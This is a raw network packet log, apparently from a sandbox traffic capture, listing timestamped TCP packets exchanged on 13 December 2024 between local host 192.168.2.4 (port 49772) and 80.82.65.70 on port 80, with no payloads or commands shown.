                                          Dec 13, 2024 08:36:35.475409985 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.538686037 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.538767099 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.538820982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.538865089 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.539026976 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.539060116 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.539163113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.539203882 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.539982080 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.540052891 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.540082932 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.540115118 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.540846109 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.540927887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.540954113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.540998936 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.541719913 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.541762114 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.541996002 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.542048931 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.542635918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.542687893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.542758942 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.542807102 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.543469906 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.543531895 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.543603897 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.543642998 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.544387102 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.544487953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.544528961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.545437098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.545484066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.545543909 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.545587063 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.546363115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.546453953 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.546468973 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.546506882 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.547333956 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.547386885 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.547424078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.547466993 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.548211098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.548257113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.548340082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.549141884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.549190044 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.549263000 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.549309015 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.550148964 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.550194979 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.550268888 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.550307035 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.551079035 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.551126957 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.551173925 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.551218033 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.552037954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.552079916 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.552381992 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.552450895 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.552968025 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.553014994 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.553227901 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.553303003 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.553987980 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.554030895 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.554131031 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.554169893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.554786921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.554851055 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.554913044 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.555439949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.555515051 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.555527925 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.555572987 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.556132078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.556174994 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.556219101 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.556265116 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.556914091 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.557020903 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.557080030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.557117939 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.557836056 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.557879925 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.557913065 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.557952881 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.558700085 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.558746099 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.558799028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.558959007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.559643984 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.559694052 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.559762955 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.559848070 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.560517073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.560561895 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.560607910 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.560674906 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.561403990 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.561444998 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.561477900 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.561517000 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.562319994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.562427998 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.562930107 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.562968016 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.563230991 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.563263893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.563308954 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.563347101 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.564250946 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.564321995 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.564322948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.564358950 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.565037012 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.565073967 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.565169096 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.565205097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.565869093 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.565999985 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.566035986 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.566838026 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.566917896 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.566930056 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.566963911 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.568053961 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.568474054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.568624973 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.568656921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.569061041 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.569155931 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.569180012 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.569192886 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.570122004 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.570168972 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.570292950 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.570339918 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.571172953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.571286917 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.571336985 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.571418047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.572319031 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.572386980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.572479010 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.572531939 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.573455095 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.573494911 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.573729992 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.573767900 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.574662924 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.574702978 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.574868917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.574934006 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.575778961 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.575819016 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.575926065 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.575969934 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.576796055 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.576838017 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.576986074 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.577023983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.577900887 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.577940941 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.578008890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.578052044 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.578779936 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.578819036 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.578841925 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.578876972 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.579680920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.579808950 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.579843044 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.580602884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.580723047 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.581016064 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.581054926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.581336975 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.581490993 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.581526995 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.582106113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.582143068 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.582211971 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.582247019 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.582854986 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.582967043 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.583007097 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.583559036 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.583605051 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.583635092 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.583673000 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.665759087 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.665782928 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.665827036 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.665878057 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.665971994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.666064024 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.666131973 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.666208982 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.666845083 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.666892052 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.666965008 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.667005062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.668122053 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.668168068 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.731514931 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.731858015 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.731978893 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.732036114 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.732048988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.732177973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.732177973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.732898951 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.733037949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.733088017 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.733931065 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.733978987 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.734080076 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.734124899 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.734761000 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.734950066 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.734996080 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.735591888 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.735640049 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.735753059 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.735815048 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.736526966 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.736577034 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.736866951 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.736953974 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.737364054 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.737411022 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.737507105 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.737552881 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.738327026 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.738511086 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.738558054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.739391088 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.739403963 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.739442110 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.739476919 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.740319014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.740329981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.740370989 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.741147041 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.741193056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.741322994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.741364956 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.742046118 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.742094040 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.742350101 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.742834091 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.742878914 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.743011951 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.743056059 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.743849039 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.743860960 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.743896008 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.743908882 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.744601965 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.744623899 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.744668007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.745457888 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.745506048 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.745630980 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.745717049 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.746484041 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.746660948 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.746712923 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.747049093 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.747091055 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.747579098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.747622967 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.748184919 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.748208046 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.748222113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.748243093 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.749049902 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.749063015 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.749098063 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.749109030 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.749856949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.750036001 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.750091076 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.750814915 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.750864029 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.750999928 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.751044989 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.751694918 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.751717091 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.751749039 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.751761913 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.752577066 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.752767086 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.752813101 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.753417015 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.753465891 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.753592014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.753635883 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.754369974 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.756294966 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.756309986 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.756324053 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.756339073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.756344080 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.756350994 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.756357908 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.756388903 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.756401062 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.757005930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.757340908 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.757390976 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.757837057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.757850885 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.757880926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.757899046 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.758949995 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.758970976 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.759020090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.759628057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.759679079 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.759810925 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.759859085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.760171890 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.760216951 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.760766983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.760812998 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.761584997 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.761631966 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.761739969 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.761785984 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.762473106 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.762660980 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.762711048 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.762859106 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.762871981 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.762902975 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.762923956 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.763358116 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.763475895 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.763533115 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.766238928 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.766297102 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.766349077 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.766393900 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.767183065 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.767205000 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.767225027 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.767250061 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.767461061 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.767482996 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.767493963 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.767505884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.767529011 CET4977280192.168.2.480.82.65.70
